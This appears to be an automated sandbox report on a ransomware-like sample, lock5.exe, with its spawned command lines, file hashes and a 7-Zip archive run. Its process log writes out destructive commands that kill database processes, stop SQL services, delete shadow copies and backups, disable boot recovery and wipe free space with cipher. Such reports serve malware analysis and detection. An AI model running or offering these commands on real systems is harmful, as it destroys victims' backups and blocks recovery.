\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlserv.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im msmdsrv.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im MsDtsSrvr.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlceip.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im fdlauncher.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im Ssms.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE

C:\Windows\system32\taskkill.exe

taskkill -f -im SQLAGENT.EXE

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im fdhost.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im ReportingServicesService.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im msftesql.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im pg_ctl.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe

C:\Windows\system32\taskkill.exe

taskkill -f -impostgres.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100

C:\Windows\system32\net.exe

net stop MSSQLServerADHelper100

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper100

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS

C:\Windows\system32\net.exe

net stop MSSQL$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQL$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW

C:\Windows\system32\net.exe

net stop MSSQL$MSFW

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQL$MSFW

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS

C:\Windows\system32\net.exe

net stop SQLAgent$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLAgent$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW

C:\Windows\system32\net.exe

net stop SQLAgent$MSFW

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLAgent$MSFW

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser

C:\Windows\system32\net.exe

net stop SQLBrowser

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLBrowser

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS

C:\Windows\system32\net.exe

net stop REportServer$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop REportServer$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLWriter

C:\Windows\system32\net.exe

net stop SQLWriter

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLWriter

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe

\\?\C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe -network

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoverynabled No

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\wbadmin.exe

wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Windows\system32\wbadmin.exe

wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\System32\Wbem\WMIC.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c pause

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cipher.exe

cipher /w:\\?\C:

C:\Windows\system32\cipher.exe

cipher /w:\\?\A:

C:\Windows\system32\cipher.exe

cipher /w:\\?\F:

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe

MD5 c87d10e375e6fec1c20dfa6da0efaeb0
SHA1 1dc5f1616b4783ac56128c9b6cae9476c4b9f09a
SHA256 10916ae59a8f99306f1af033bb5e97df353e36be9eeaf41264a9146e56f9197e
SHA512 a1adf4f8a4b33e1c1c4db1db42e4052ce07ea958e43d56553a200671888fccb8ed4777efa120f79950ec9eae42734d74c64062b1eccf57b06d4e7da04b84c4ee

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 08:45

Reported

2024-11-14 08:48

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

149s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\lock5.rar"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\lock5.rar"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 134.130.81.91.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 22.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

N/A